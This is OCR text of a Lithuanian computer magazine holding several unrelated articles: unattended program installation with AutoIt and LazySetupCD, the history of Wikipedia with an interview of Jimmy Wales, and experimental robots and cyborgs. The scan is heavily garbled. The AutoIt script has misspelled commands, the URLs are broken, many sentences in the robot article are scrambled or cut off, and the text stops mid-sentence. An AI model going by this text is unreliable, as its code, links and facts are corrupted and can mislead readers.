Run, cempNazySetupCDYselup. exe. 

// palaukiome, kol atsiras: reikiamas langas 
WinWaitActive, Liconcinis susitarimas 

// spaudžiame „Taip“, Ly. pasiunčiame Enter paspaudimą 
Send, (Enter) 

// laukiame, kol pasirodys: kitas: Jongas 
WinWaitAcive, LazySetupCD v.1.1 

1! spaudžiom OK 

Send, (Enter) 

// pabaiga 

Eil 


Parsisiųsti paruoštus automatiniam programų įdiegimui su Autolt 
skirtus skriptus galima gauti adresu www.msfn.org/boardlindex. 
php?showtopic=20197. Autolt skirtų skriptų parašymas — nepa- 
prasta užduotis, kadangi reikia išstudijuoti skriptinės kalbos 
sintaksę ir operatorius. Programos vartotojo sąsaja ir dokument- 
acija pateikiami anglų kalba. 

LazySetupCD Įeidžia kurti įdiegimo diskus, iš kurių tu pro- 


gramas galėsi įdieginėti automatiniu režimu, t.y. neda- 
lyvaujant vartotojui, pagal iš anksto sudarytą algoritmą. 
Norint sudaryti kokios nors programos įdiegimo algoritmą, 
būtina nurodyti visus veiksmus, kuriuos įdiegimo metu 
turės emuliuoti LazySetupCD. Tokiems veiksmams priski 
riama: 


1. Nuspausti mygtuką 

2. Uždėti/nuimti vėliavėlę 
3. Sukonfigūruoti perjungiklį 
1. Įvesti tekstą 


Šių veiksmų pakanka, kad sudarytum daugelio programų 
įdiegimo algoritmus. Algoriimas sudaromas panaudojant 
LazySetupCD vartotojo sąsają, čia nereikia rašyti jokių 
skriptų. Mygtukai, vėliavėlės ir jungikliai identifikuojami 
pagal jų pavadinimą. Tai reiškia, jeigu tu nori, kad LazySet- 
upCD kokios nors programos įdiegimo metu tris kartus iš 
eilės nuspaustų „Next“ mygtuką, tau pakanka tris kartus 
pridėti veiksmą „Nuspausti Next mygtuką“. 

Autolt atveju tam, kad užprogramuotum tris taip pat 
besivadinančio mygtuko nuspaudimus iš eilės, tekdavo 
nurodyti lango požymį, kuriame yra mygtukas. LazySet 
upCD, priešingai nei Autolt, nesipainioja su mygtukų nus- 
paudimais, todėl tris kartus to paties mygtuko nespaus. 

Norint įvesti tekstą (pavyzdžiui, serijinį numerį), tau taip 
pat nereikės nurodyti nieko papildomo. Jeigu eilinį kartą 
nuspaudus mygtuką „Next“bus pasiūlyta įvesti vartotojo 
vardą ir serijos numerį, tai LazySetupCD sąsajoje pakaks 
nurodyti veiksmą „Įvesti tekstą“. Kiekvienas tekstinis 
fragmentas įdiegimo lange bus įvedamas tabuliacijos 
tvarka. 

Su LazySetupCD tu gall instaliatorius | diską įrašyti kartu su 
įdiegimo algoritmais. Kartu su LazySetupCD pateikiamas 
autorun.exe modulis, Kuris įrašomas į diską ir kuris atlikinės 
automatinį įdiegimą. Su juo tu galėsi išsirinkti programas, kurias 
nori įdiegti automatiniu režimu. 

Internete taip pat yra paruoštų LazySetupCD automatinio 
įdiegimo skriptų rinkinys, kurį galima parsisiusti iš autosetup. 
Org.ru. 


[Išvados] Taigi mes aptarėme tris galimus automatinio 
programų įdiegimo metodus: 

1, Su raktais ir komandinėmis bylomis 

2. Su Autolt 

3. Su LazySetupCD 

Be jokios abejonės, pats greičiausias metodas yra 
įdiegimas su raktais ir komandinėmis bylomis, kadangi 
šiuo atveju nėra jokių įdiegimo langų, jų atvaizdavimui 
nėra eikvojamas kompiuterio darba laikas. Tačiau su 
šiuo metodu ne visada pavyksta pasiekti pageidaujama 
rezultatą (pavyzdžiui, nepavyksta parinkti reikiamų auto- 
matinio įdiegimo raktų). Tuomet į pagalbą ateina vartotojo 
veiksmu emuliatoriai Autolt ir LazySetupCD. Norint 
efektyviai pradėti naudoti Autolt, teks skirti laiko specialios 
skriptinės kalbos sintaksei išmokti. LazySetupCD suteikia 
paprastesnę ir patogesnę įdiegimo algoritmo sudarymo 
vartotojo sąsają 

Kuo naudotis - spręsti tau 


Visa.pasaulio 


„Tūlė“ 
Žž pers 
tavo PC! 
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KIEKVIENAS INTERNAUTAS BENT KARTĄ GY- 
VENIME SĖDĖJO ĮBEDĘS AKIS | NARSYKLĘ SU 
KRŪVA ATIDARYTŲ PAIEŠKOS SISTEMŲ IR LIŪDNAI 
SVAJOJO APIE SVETAINĘ, KURIOJE YRA VISKO. AT- 
SAKYMAI Į VISUS KLAUSIMUS, IŠSAMŪS STRAIP 
SNIAI VISOMIS ĮMANOMOMIS TEMOMIS, J 
INFORMACIJOS... SAKAI, TAI UTOPIJA? ANAIPTOL, 
MIELAS DRAUGE, TOKIA SVETAINĖ YRA, O JOS 
PAVADINIMAS — WIKIPEDIA. NORI 

APIE STAMBIAUSIĄ ENCIKLOPEDIJĄ ZMONIJOS 
ISTORIJOJE, KURIOS DEVIZAS: „MES RENKAME 
PASAULIO ŽINIAS“? TUOMET SKAITYK TOLIAU. 


Wikipedia 

Pasaulio žinių kaupykla 

[Enciklopedinės šaknys] „Vieningos pasaulio žinių bazės“ 
sukūrimo idėja siekia tolimą praeitį. Dar senovėje žmonės bandė 
kažkaip sistematizuoti ir įamžinti savo žinias. Finale buvo sugalvo- 
tos enciklopedijos. Tiesa, naudotis dideliais jų tomais ne visada 
patogu. Pavyzdžiui, 1950-1960 metais išleistą Didžiąją Sovietinę 
Enciklopediją (DSE) sudarė 51 tomas. Visas šis lobis užima daug 
vietos, brangiai kainuoja, 0 kol surasi tai, ko reikia, gali praeiti 
daug laiko. Šios situacijos nepataisė nė 1960 metais išleista 
dviejų tomų abėcėlinė DSE rodyklė. Be abejo, mūsų laikais šią 
seną Didžiąją Enciklopediją galima įsigyti CD arba DVD formatu, 
tačiau čia iškyla dar viena problema — informacija sensta siaub- 
ingai greitai. Mokslininkai atranda kažką naujo, rašytojai rašo 
naujas knygas, kiekvieną dieną išleidžiama tūkstančiai laikraščių, 
televizija progresuoja, 0 apie interneta iš viso baisu net užsiminti. 
Visa tai susekti praktiškai neimanoma. Kiek žmonių kasdien turėtų 
dirbti prie tokio leidinio, kuris koja kojon spėtų su laiku ir kuriame 
būtų atnaujinami ne tik seni straipsniai, tačiau ir pridedami nauji? 
Tačiau jeigu anksčiau toks dalykas buvo fiziškai neįmanomas, tai 
atsiradus internetui situacija pasikeitė. Šiandien visos stambiausios 
pasaulio enciklopedijos turi savo internetinius variantus. Ir visos jos 
yra mokamos. Kalbu ne apie porą žaliųjų prezidentų. Pirmaujančių 
enciklopedijų spausdinto leidimo kaina siekia 1500 dolerių, o 
už priėjimą prie internetinės svetainės lankytojams tenka pakloti 
po 50 dolerių per metus. Internete laisvai prieinamos tik visiškai 
pasenusios enciklopedijos, pavyzdžiui, 1911 metų „Britanikos“ 
enciklopedija, arba beta versijos, kuriose rasi mažiau nei 1096 
visų straipsnių. 

Ar galima tokiomis sąlygomis sukurti konkurencingą nemokamą 
resursą? Galima, jeigu į tai įtraukiami patys vartotojai. Wikipedia 
—tai enciklopedija, kurią papildo visas pasaulis, ir nors ji egzistuoja 
dar tik 5 metus, savo turiniu ji jau seniai pavijo ir aplenkė visas 
likusias „žinių kaupyklas* bei toliau veržliai plėtojasi. 


[Wiki istorija] Wiki istorija prasidėjo 2000 metais, kuomet Laris 
Sengeris ir Džimis Veilsas, kuris tada buvo kompanijos „Bomis“ 
generalinis direktorius, nusprendė sukurti nemokamą ir lengvai 
prieinamą tinklinę enciklopediją. 2000 metų kovą jie sėkmingai 
atidarė Nupedia (NuPedia.com) svetainę, kurią finansavo Veilso 
firma ir kuri veikė atviro kodo programinės įrangos pagrindu. 
Pagrindiniu Nupedia ypatumu tapo visiškas autorinių teisių nebu- 
vimas. Visa svetainės medžiaga buvo platinama pagal GNU FDL 
(bendrąją GNU licenciją), kuri kiekvienam vartotojui suteikia teisę 
redaguoti ir platinti (dalinai arba pilnai) bet kokio straipsnio turinį, 
niekam nemokant jokių procentų ir nepažeidžiant jokių įstatymų. 
Veilsas ir Sengeris savo resurso populiarinimą pradėjo parašydami 
laiškus keliems žymiems mokslininkams, siūlydami jiems pa- 
tiems sudalyvauti Nupedijos gyvenime. Pačioje svetainėje buvo 
pateiktas RTF formato skelbimas, kurį buvo siūloma atspausdinti 
ir pakabinti savo mokymo įstaigoje. Taigi pirmaisiais straipsnių 
autoriais tapo įvairių šalių mokslininkai ir profesoriai. Tame pagei- 
daujantiems sudalyvauti paprastiems žmonėms tekdavo iš pradžių 
susisiekti su skyriaus redaktoriumi ir jam įrodyti, kad tu iš tiesų 
susigaudai toje srityje. Jeigu gaudavai leidimą, tuomet galėjai 
imtis darbo ir po to savo straipsnį išsiųsti tam pačiam redaktoriui, 
kuris jį pats įvertindavo ir parodydavo savo kolegoms. Po kelių 


žmonių patvirtinimo straipsnis būdavo išsiunčiamas specialiam 
žmogui, copyeditor'iui, kuris jame ieškodavo autorinėmis teisėmis 
apsaugotų tekstų arba paveiksliukų. Ir tik po to vargšas straipsnis 
sugrįždavo pas redaktorių, kuris ji pakabindavo svetainėje. 

Šis procesas buvo ilgas ir sudėtingas, todėl Nupedia straipsnių 
kiekis neviršijo šimto. Galų gale tapo aišku, kad su tokiu požiūriu 
svetainė greitai plėtotis negali, jau nė nekalbant apie pilnavertį 
konkuravimą su lyderiaujančiomis enciklopedijomis. 2001 metų 
pradžioje kūrėjai jau mąstė apie Nupedijos uždarymą, kai staiga 
Lario Sengerio bičiulis Benas Kovicas pasiūlė visų problemų 
sprendimą. Technologija, apie kurią jis pasakojo, vadinosi Wiki. Ji 
leisdavo bet kuriam pageidaujančiajam pridėti straipsnius į svetainę 
irjuos redaguoti, apeinant ilgą redaktorių grandinę. Svarbiausia čia 
tai, kad kiekvieno straipsnio pataisymo istorija saugoma amžinai, 
todėl jeigu bus ištrinta kas nors svarbaus arba atlikti pakeitimai 
pasirodys esą neteisingi, sugrąžinti viską į pradinę būseną galės 
bet kuris tai pastebėjęs lankytojas. 

Iš esmės Wiki — tai hipertekstinė rašytinės informacijos surinkimo 
ir struktūrizavimo aplinka. Pirmasis wiki tinklas buvo „Portlendo 
programinio kodo pavyzdžių saugykla“. Tinklą 1995 metų kovo 
25 dieną sukūrė programuotojas Vardas Kaningemas. Patį žodį 
wiki (tiksliau sakant, wiki-wiki) jis pasiskolino iš havajiečių kalbos, 
kurioje tai reiškia „labai greitai“, „kuo greičiau“. Svarbu tai, kad 
Wiki technologijoje viskas remiasi kolektyviniu darbu, Visų Wiki 
svetainėje dirbančių žmonių patogumui naujų puslapių pridėjimo ir 
taisymo sistema supaprastinta iki dviejų pelės mygtuko paspaudimų 
— „Redaguoti - Išsaugoti“, o visos redagavimo operacijos atlieka- 
mos tiesiog naršyklės lange. Bet kuris Wiki svetainės puslapis — tai 
straipsnis, susidedantis iš pavadinimo ir turinio, į kurį galima įterpti 
HTML tagus arba ypatingą Wiki žymėjimo (mark -up) kalbą, kuri, lygi- 
nant su tagais, pripažinta kaip paprastesnė ir patogesnė. Pavyzdžiui, 
norint tekste įterpti nuorodą į kitą puslapį, tau nereikia rašyti <a 
href= "http://nuorodos-adresas“ > Nuorodos pavadinimas</a > ir 
panašiai. Pakanka tiesiog įterpti straipsnio, į kuri nori nukreipinėti, 
pavadinimą (kvadratinėse kabutėse -— [Straipsnio pavadinimas])), 
nuspaudęs mygtuką „Išsaugoti“ gausi nuorodą. Neveikiančių 
nuorodų tiesiog nėra. Jeigu straipsnis tokiu pavadinimu jau yra, 
tuomet nuoroda bus mėlynos spalvos, o jeigu ne — raudonos, ir 
atves tave į puslapį „kol kas nėra parašyto straipsnio“. 

Sengeris užsidegė šia nauja idėja ir nesunkiai įtikino Veilsą 
pakeisti Nupedijos varikliuką į naująjį. 2001 metų sausio 
10 dieną enciklopedija jau buvo paleista naujuoju formatu. 
Tačiau ne visi į šią naujovę žiūrėjo optimistiškai. Daugeliui prie 
projekto dirbančių mokslininkų idėja iš esmės nepatiko, nes 
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Jos gąsdino mintis, kad straipsnius galės redaguoti bet kuris 
pageidaujantysis. „Kas bus, kai tūkstančiai paprastų vartotojų 
prisikas iki svetainės ir pradės viską keisti pagal save? Koks 
objektyvumas gali būti tokiuose abejotinuose ir niekieno ne- 
kontroliuojamuose duomenyse?“. Prieštaravimas buvo toks 
stiprus, kad Veilsas ir Sengeris pasitarė bei Nupedijai grąžino 
senąjį varikliuką, o po to tiesiog sukūrė naują svetainę — Wiki“ 
pedia.com. GNU FDL licencija jiems leido į Wikipediją perkelti 
visą Nupedijos informaciją, o senąjį resursą palikti nepaliestą 
specialiai tiems, kas nepageidavo pokyčių. 


Į„Wikipedia“ šiandien] Oficialiai Wikipedia.com (o vėliau — Wiki- 
pedia.org) buvo paleista 2001 metų sausio 15 dieną. Pagrindiniais 
Jos principais tapo neutralus požiūris į visus straipsnius, visiška 
informacijos laisvė ir nemokamas priėjimas. Ir, be jokios abejonės, 
laisvas priėjimas ne tik prie enciklopedijos skaitymo, bet ir prie jos 
taisymo. Nepaisant niūrių mokslininkų prognozių, viskas buvo ne 
taip baisu. Wiki technologijos kritikams visada kliuvo jų nuomone 
silpniausia sistemos vieta — vandalizmas. Suteikus straipsnių reda- 
gavimo galimybę bet kuriam vartotojui, reikėjo tikėtis, kad norinčių 
ateiti irviską sugadinti bus nemažai. Tačiau apie vandalizmą viskas 
jau seniai pasakyta pačioje Wikipedijoje. Štai ištrauka iš straipsnio 
„Wikipedia: Vandalizme 

vandalizmas, nepaisant paplitusios nuomonės, iš tiesų Wiki- 
pedijai nėra didelė problema, kadangi visi straipsnių pakeitimai 
saugomi specialioje duomenų bazėje. Taip piktavaliai negali visiškai 
sunaikinti visos informacijos. Lankytojas, pastebėjęs, kad straipsnis 
buvo sugadintas, gali sugrąžinti nepažeistą versiją, tą padaryti 
visiškai nesudėtinga. Norint į straipsnį įtraukti perspėjimą, reikia jo 
profilio aptarime pridėti vandalo šabloną: (įsubst:vandal)). 
Kadangi žmonių, norinčių užsiiminėti vandalizmu, skaičius apy- 
tiksliai lygus norinčių atstatyti teisybę žmonių skaičiui, sukurtos 
sąlygos, kurioms esant pastarąjį variantą įgyvendinti lengviau, 
nei pirmąjį, Wikipedijos medžiagą padaro vis labiau ir labiau 
atitinkančią tiesą. Pasak tyrimų rezultatų, daugelis vandalizmo 
pasekmių angliškoje Wikipedijos dalyje neutralizuojamos per labai 
trumpą laiką“ 


Britanikos“ enciklope 


Te Ad 


NN 


šiuose Floridoje esančiuose seiveriuose saugoma Wiki 
Pateiksiu dar keletą skaičių, kad galėtumei suprasti, kokius kolosal- 
ius mastus šiandien pasiekė laisvoji enciklopedija. Pais stambiau- 
sias kalbinis Wiki segmentas kaip ir anksčiau lieka angliškas, kurį 
dabar sudaro beveik 900 tūkstančių straipsnių. Iš viso Wikipedijoje 
straipsniai pateikiami daugiau nei 200 kalbų, todėl projektas iš 
tiesų tarptautinis. Prieš keletą metų Wikipedia.org svetainė net 
nejėjo į 10000 geriausių interneto svetainių sąrašą, 0 dabar ji yra 
tarp 30-ties geriausiųjų, su daugiau nei 2,5 milijardų puslapių 
užklausų per mėnesį. Pernai Wikipediją kasdien naudojo apie pusė 
procento internautų, šiandien šis skaičius padidėjo maždaug keturis 
kartus. 2003 metais Wikipedijos biudžetas siekė 15 000 dolerių, 
2004 metais — 25 000 dolerių, o šiais metais — daugiau nei 
700 000 dolerių. Ateinančiais kalbėsime jau apie milijonus dolerių 
Šį biudžetą suformuoja Wikipedijos fondas ir dešimtys tūkstančių 
savanorių, kurie projektui palaikyti skiria savo laiką ir jėgas, tikėdami 
tuo, kad žinios tai jėga, ir jos turi būti laisvai prieinamos. 
Čia pagrindinis principas kiekvienas įmoka įnašą pagal savo 
pajėgumus, beje, vidutinis įnašas yra maždaug 20 dolerių, Wiki 
media fondas palaiko ir kitus ne enciklopedinius laisvų publikacijų 
internete projektus: laisvąją biblioteką (Wikiteka), nemokamus 
vadovėlius (Wikivadovėlis), žodynus (Wikižodynas), atvirą naujienų 
leidyklą (Wikinaujienos) ir citatų rinkinį (Wikicitatos). 


[Desertui — interviu] Kas geriau galėtų papasakoti apie svetainę, 
jeigu ne jos kūrėjas? Man pavyko gauti paties Džimio Veilso, vien- 
intelio neatitrūkusio nuo reikalų Wikipedijos tėvo-kūrėjo interviu 
Laris Sengeris paliko projekta ir dabar dėsto filosofiją Ohajo valstijos 
universitete. 

Mifrill (M): Visai neseniai kilo didelis su Wikipedia susijęs skan 

dalas. Dėl to kalta buvo žymaus žurnalisto Džono Seigentalerio 
biografija, kurioje buvo pateikti neteisingi duomenys, 0 Seigen 

taleris juos palaikė įžeidžiančiais. Jis laikraštyje „USA Today 

net išpublikavo skandalingą straipsnį, kaltindamas Wikipedia 
šmeižtu. Jūs savo ruožtu tiesioginiame CNN eteryje pranešėte apie 


laikinos, analogų neturinčios 
sankcijos įvedimą: dabar 
neužsiregistravę anglakalbės 
resurso versijos vartotojai 
negalės kurti naujų straipsnių. 
Norėtusi sužinoti, ar likusiuose 
segmentuose taip pat bus 
įvestos analogiškos sankcijos 
ir kaip jūs ruošiatės ateityje 
apsaugoti Wiki nuo panašių 
incidentų? 

Džimis Veilsas (DV): Ne, kitų 
kalbų segmentuose taikyti 
tokių priemonių neplanuo- 
jama. Mes nuolat judame, 
progresuojame, tobuliname 
mūsų programinę įrangą, 0 
augant Wikipedijai ruošiamės 
ir toliau laikytis šios krypties. 
Neužilgo kaip tik bus aptari- 
amas ištisos naujų įrankių 
serijos įgyvendinimas, ku- 


Jei bent minimaliai Koki 
anglų kalbą — būtinai 
aplankyk: 
http://en-wikipedia.org/ 
wiki Russian. jokos 
http:!/en.wikipedia.org! 
Wikl/Sexual. position 
http://en.wikipedia.org/ 
WiklIPomography 
http: //en.wikipedia.org! 
WikilGroup sex 
Jokių nepadorumų 
vien tik informacija! 
Sužinos! daug naujo +). 
Taip pat siuyčiau paek- 
Sperimentiuot su rusiškais 
necenziriniais žodžiais. 
http://vavw.ikipedia.org 
pagrindinis laisvosios 
enciklopedijos puslapis 
http:!/lt wikipėdia.org 
lietuviškoji Wikipedia 
http://meta.wikipedia.org 


Wikipedia apie Wikipe- rie leistų išsamiau stebėti 
dia, Visa Informacija apie svetainę. Taip pat mes greitai 
projektą testuosime naują straipsnių 


apdorojimo mechanizmą. 
M: Ar seniai paskutinį kartą jūs pats rašėte straipsnius Wikipedijai? 
Ar užsiiminėjate tuo dabar? 
DV: Paskutinis mano Wikipedijos straipsnis buvo apie Timą 
Galacherį — mokslininką, kuris dalyvavo pakartotiname baltasnapių 
karališkų genių atradime. Iš tikrųjų tai aš ne taip dažnai užsiiminėju 
Wikipedijos redagavimu arba straipsnių rašymu, kadangi tam beveik 
neturiu laiko. Tačiau jeigu pavyksta tam skirti vieną kitą valandėlę, 
darau tai labai mielai. 
M: Wikipedia milžiniška, tiesiog kolosali. Ir nors anglakalbis seg- 
mentas lieka stambiausias, kitos kalbos taip pat svarbu. Ar jūs 
studijuojate kitus Wiki segmentus, ar stebite jų plėtojimąsi? 
DV: Dabar aš kaip tik mokausi vokiečių kalbos ir aktyviai nau- 
dojuosi vokiškąja Wikipedia, kuri man padeda tobulinti kalbos 
žinias. Kiekvieną dieną stengiuosi perskaityti bent porą vokiškų 
straipsnių. Be to, aš stengiuosi palaikyti ryšį su kuo daugiau kitų 
Wiki bendruomenių, tačiau čia viskas remiasi nuolatiniais asmen- 
iniais ryšiais su šių bendruomenių lyderiais. a jau aš labai 
esame labai draugiška bendruomenė. 
M: Naujajame „Nature“ žumale lyginama Britanikos ir Wikipedijos 
kokybė. Žurnalo ekspertai Wikipedijoje aptiko daugybę faktinių 
klaidų. Žinoma, šis straipsnis sąlygojo tai, kad Wiki bendruomenė 
ištaisė paminėtuose straipsniuose aptiktas klaidas. Tačiau kaip 
bus su likusiai straipsniais? Kas tai per enciklopedija, jeigu ja 
negalima pasitikėti? R 
DV: Visa svetainės medžiaga yra nuolat rimtai tikrinama. Šiuo metu 
straipsnių apdorojimo mechanizmas veikia taip, kad redaktoriai 
galėtų kuo paprasčiau pažymėti ir redaguoti taisymo reikalaujančius 
straipsnius. 
M: Ar bus išleista popierinė Wikipedijos versija? 
: Taip, šiuo klausimu jau buvo deramasi su daugybe leidyklų. 
Tačiau kol kas projektas yra pačioje ankstyviausioje stadijoje, todėl 
kalbėti apie tai dar anksti. 


M: Yra tokių straipsnių, kurių tematika ganėtinai aštri ir kai kuriems 
žmonėms gali sukelti įniršį. Kiek jūsų autoriai apsaugoti nuo tokių 
negeranoriškų asmenų? 

DV: Autoriai turi galimybę užsiregistruoti ir publikuoti straipsnius 
arba atlikti pakeitimus ne tiesiogiai savo IP adreso vardu, o su jų 
pasirinkto vartotojo vardu. Tokiu atveju IP niekur nebus atvaizduoja- 
mas. Savo ruožtu, Wikimedia fondas asmeninius užsiregistravusio 
vartotojo duomenis, tokius, kaip jo IP adresas, pateiks tik teismo 
sprendimu. 

M: Wikimedia fondas nuolat renka pinigus naujiems serveriams. 
Tačiau bazės apimtis auga geometrine progresija, todėl anksčiau ar 
vėliau ateis metas, kada Wikimedia visų šių duomenų saugojimui 
negalės surinkti pakankamo pinigų kiekio. Kas nutiks tuomet? 
DV: Mums niekada neiškildavo finansinės aparatūros pirkimo 
problemų. Naujų serverių poreikis atsiranda tuomet, kai padidėja 
srautas, tačiau išaugęs srautas reiškia, kad pas mus ateina 
daugiau žmonių, kurie gali paaukoti pinigų naujiems serveriams. 
Mums aktualesnė kita problema: kaip surinkti pakankamai 
priemonių mūsų labdaringų projektų palaikymui besivystančiose 
šalyse. 

M: Kadangi aš atstovauju „Hakerio“ žurnalą, tai tiesiog negaliu 
nepaklausti, ar Wikipedijos svetainė kada nors buvo nulaužta? 
Jeigu ne, tai ar egzistuoja tokia galimybė, kad hakeris galės 
pateikti į serverį ir ištrinti Wikimedijos bazę ir visas jos rezervinės 
kopijas? 

DV: Atsakymas į pirmąjį klausimą — ne. Dėl antrojo klausimo... 
Visa Wikipedijoje saugoma informacija patenka po jums žinoma 
GFDL licenciją. Tai yra, visas turinys visiškai nemokamas ir gali būti 
laisvai platinamas internete bet kokiu pavidalu. Taigi, jeigu hakeris 
nulauš mūsų serverius ir sunaikins visas Wikipedijos duomenų 
bazes, tai jis pašalins tik bazes, o ne pačią informaciją. Informacija 
yra visur ir jos sunaikinti neįmanoma. 
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Jūs robotas? 

Robotai, apie kuriuos 

tau dar neteko girdėti 

MANAU, KAD TAU NEREIKIA AIŠKINTI, KAS 
YRA ROBOTAS. TU VEIKIAUSIAI ESI MATĘS 
DAUGYBĘ FILMŲ IR PERSKAITĘS PAKANKA- 
MAI KNYGŲ, TODĖL ŠIS ŽODIS TURĖTŲ 
BŪTI ĮSITVIRTINĘS TAVO LEKSIKONE.. 
PAKALBĖKIME APIE TUOS ROBOTUS, KURIE 
TUO PACIU VISAI NE ROBOTAI. TAI YRA, JIE 
ROBOTAI, TAČIAU JEIGU TAU VIENĄ IS JŲ 
PARODYTŲ IR PAKLAUSTŲ, KAS TAI, TU JO 
TIKRAI NEPAVADINTUM ROBOTU. 


Tavo 'ų supratimu, robotas tai toks metalinis hu 
manoidas, kuris kalba džeržgiančiu metaliniu balsu ir 
norėdamas pasikrauti nuolat kiša pirštus į rozetę. Kiuems 
robotas asocijuojasi su Švarcnegeriu ir Termir imi, 
o jaunesniems piliečiams žodis „robotas“ t 
ir spamą siuntinėjanų botą, kurį įsivaizduoti kaip kažka 
gyvo ir judančio būtų sunkoka. 

Tačiau kas pasakys, kad skalbimo mašina taip pat galėtų 
ti vadinama robotų? Arba mikrobangu krosnelė? Nepai 
elis mokslininkų robotais vadina bet kokius 
mechanizmus, kurie gali vykdyti nurodytas programas. Ir 
net neseniai iš dviejų DNR grandinių sukurtas gabalėlis. 
kuris galijudeti ant ATF molekulių tirpale esančio plokščio 
paviršiaus — taip pat robotas 

Šiame straipsnyje aš tau papasakosiu apie nepaprastus 
robotus, kurie jau egzistuoja Ir dar tik egzistuos. Tu su- 
prasi, kad robotas ne visada reiškia „smegenys“. 


ali reikšti r 


ĮSmegenys dėžutėje] Kam kurti sudėtingą dirbtinį 
intelektą navigacijos sistemoms ir robotų judėjimui, ar 
ne lengviau būtų pasinaudoti tuo, kas jau yra pa ranka? 
Pavyzdžiui, gamtos kompasai. Plačiai žinomi tokie tikslūs 
navigaciniai prietaisai, kaip vežliai, šikšnosparniai 
gyvatės Ir t.t. Taip išeina, kad šiandien lengviau robotui 
„Imontuoti“ vėžlio arba šikšnosparnio smegenis, kad 
šios užsiimtu navigacija. Kol kas mokslas dar nepriėjo 
iki tokių sudetingu kiborgų kūrimo, tačiau jis jau turi kuo 
p 
Viena iš gamtos mėggdži šakų | dirbtinių neuronų 
1r neuroninių tinklų kūrimas. Beje. čia visiškai nebūtina 
imti realių neuronų ir juos auginti — paprasčiau visa 
tai sumedeliuoti. Matematinis žmogaus neurono mod 
elis buvo sukurtas dar 60 aisiais praėjusio amžiaus 
metais. Atrodytų, surink keliolika milijardų neuronu, ir 
gausi veikiančias smegenis. Vis dėlto problema buvo 
ne čia: Luometinės galimybės leido sumodeliuoti tik 
paprasčiau penkiasdešimties neuronų sudarytas 
ines I S. Ir viskas. Tačiau dabar kompiuteriai kur 


girti. 


CŽ 


kas galingesni. Dabar jie jau šimtu procentu pajėgūs s: 
bent jau sraigės smegenis. Žmogaus pilkosios masės modelio da 
reikės palaukti. 

1. Vienas iš tokių robotų su virtualiomis smegenimis larwin VII 
Jį sukūrė amerikiečių tyrinėtojai iš La Džolės Neurologijos institut 
(Kalifornija). Šios virtualios smeg 
tūkstančių virtualių „neuro) 
Mokslininkų tvarinys susideda ne vien tik iš virtualių s 
robotas turi pagrindą, ant kurio pritvirtinta ranka -manipuliai 
ir valdymo mechanizmai. kurie skirti Judė 
supančių pasauliu, 


nys susideda iš dvidešimtie 


mui ir kontaktavimui Si 


Tuo pačiu Darwin VII turi praktiškai pilna pojūčių „Org: i 
CCD kamera veikia kaip akys, keli mikrofonai fiksuoja g ( 
specialūs sensoriai leidžia jausti skonį. Savo dydžiu Ir forma robotai: 
primena šiukšlių dėžę. 

Darwin VII veikia Vadovaudamasis „įgimtais skaitmeniniais Instink 
tais“. Jį domina visa supanti aplinka, jis pats mokosi. Pavyzdžiui 
judėdamas ant grindų ir tyrinėdamas išmetytus tus, robota 


gali savarankiškai nustatyti, kad pavyzdžių su juostelėmis skoni 
malonus, 0 plėmuotų nelabai 

Savaime suprantama, progresas tuo neapsiriboja, greitai pavyk: 
sukurti galvos smegenų analogą (pagal neuronų SI Vėl lau 
kiame kompiuterių našumo padidėjimo: 

Visai kas kita, kuomet galima išauginti nervinį audini, pr 
savo reikmėms. Tiesa, kol kas išauginti galima ne 
0 tik paprasčiausius nervinius m: 
dirgiklius. Pavyzdžiui, dvi mokslininkų komandos iš linojaus (Či 
ir Genujos universitetų (Italija) sut 
nugaros smegenų neuronais. Kodėl būte: 


s, Kurie reaguoja 


kiborga su de 


prastas: jos neuronai didžiausi. Mašina susideda iš kelėt 
neuronų. fotosensoriaus, mikroprocesortaus ir ratų 

2. Viskas, ką šis kiborgas kol kas moka daryt ideti link šviėsc 
šaltinio. Visa tai vyksta taip: elektronine akis aptinka 


oda signala į negės net 


šaltinį ir pe nus, kur 


mikroprocesorių valdo ratus, kad priartėtų prie šio šviesos šaltinio 
Be to, jeigu išjungsi šviesą, tai kiborgas nustos judėjęs. O Jeigi 
aljungsi Vieną iš sensorių, žuvis robotas Iš pradžių dezorientuosis 


is tiek suras šviesos šaltinį. Kol H 
gali reaguoti tik į šviesa, tačiau jau der 


po k 
str 


klasikinę elgseną: seka šviesos 
šaltini, suka aplink jį ratus ir t.t. 
Sveikiname mokslininkus! Jiems 
pavyko įrodyti, Kad mes ir mašinos 
esame vienarūšiai! Iki matricos 
a liko visai nedaug. 

JU „Žuvies nugaros smegenys buvo 


išgautos atlikus pilną anesteziją 


ir įkeltos | deguonies prisodrintą 
druskos tirpalą. Vietoje įvedimo/ 
išvedimo jungčių buvo naudoja- 
mos Miulerio (ne SS viršininko) 
ląstelės su į jas įmontuotais ele- 
ktrodais. Šios ląstelės pakanka- 
mai didelės, jas patogu prijungti, 
jos padeda integruoti valdymo 
ir juslės organų signalus, kurie 
eina į motorinius nervus, kad 
nėgė susiorientuotų erdvėje. Nuo 
foiosensoriaus einantys elektrodai neuronus stimuliavo mums 
įprastuose dažniuose, o judėjimą valdantys elektrodai fiksavo 
sonu ląstelių potencialą. Tuo pačiu kiborgo smegenys nebuvo 
ant Judančios platformos — platfofma su smegenimis buvo sujung- 
laidu, Judanti platforma -— populiarus daugiafunkcinis robotas 
pera, Kuriam smegenys perduoda jo valdymo komandas. 

3. Viena pagrindinių „žuvies-terminatoriaus“ problemų trumpas 
negės neuronų amžius. Pastarieji druskos tirpale gyvena tik keletą 
po ko juos reikia pakeisti, todėl ilgesniam kiborgo funkcion- 
ui reikalingos didelės nėgių atsargos. Ateityje po atitinkamų 
treniruočių kibargas smegenų atsargas greičiausiai galės papildyti 
i natūraliu būdu: žvejodamas, eidamas į prekybos centrą ir 
panašiai. 

Savaime suprantama, surasti pritaikymą į šviesą reaguojančiam 
robotui bus, švelniai tariant, nelengva, kadangį visa tai, tik kurkas 
tau, gali daryti jau egzistuojanti elektronika. Vis dėlto čia svarbus 
tokio roboto sukūrimas (valio, draugai!). Pasak kiborgo kūrėjų, 
unikalumas tame, kad tai veikianti uždara sistema, kuri yra 
žingsnis pirmyn link neuroinžinerijos. Kol kas kiborgo kūno judėjimą 
valdo ne visos nėgės smegenys, o tik kelios smegenų ląstelės. 
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Vėliau šis pasiekimas gali sąlygoti tobulesnių protezų sukūrimą. Be 
to, vystantis mikroelektronikai šią technologiją bus galima pritaikyti 
praktiškai su visais gyvais organizmais, kas atveria dideles mūsų 
ateities perspektyvas. 

Robotas -— realybės šou 

Žmonės visada smarkiai vertino bet kokią veiklą, kurią būtų 
